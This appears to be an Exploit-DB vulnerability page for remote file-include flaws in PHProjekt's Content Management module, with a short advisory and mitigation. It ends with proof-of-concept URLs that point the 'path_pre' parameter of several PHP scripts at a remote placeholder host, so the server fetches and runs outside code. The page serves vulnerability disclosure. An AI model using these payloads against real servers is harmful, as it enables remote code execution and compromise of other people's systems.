header-logo
Suggest Exploit
vendor:
Content Management Module
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File-Include
98
CWE
Product Name: Content Management Module
Affected Version From: 2000.6.1
Affected Version To: 2000.6.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Multiple Remote File-Include Vulnerabilities in PHProjekt

Multiple remote file-include vulnerabilities affect the Content Management module for PHProjekt because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call. An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in a PHP 'include()' function call.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19628/info

Multiple remote file-include vulnerabilities affect the Content Management module for PHProjekt because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call. 

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. 

These issues affect version 0.6.1; earlier versions may also be vulnerable.

http://www.example.com/[Path]/cm_lib.inc.php?path_pre=http://cmd.gif? 
http://www.example.com/[Path]/doc/br.edithelp.php?path_pre=http://cmd.gif? http://www.example.com/[Path]/doc/de.edithelp.php?path_pre=http://cmd.gif? http://www.example.com/[Path]/doc/ct.edithelp.php?path_pre=http://cmd.gif? 
http://www.example.com/[Path]/userrating.php?path_pre=http://cmd.gif? 
http://www.example.com/[Path]/listing.php?path_pre=http://cmd.gif?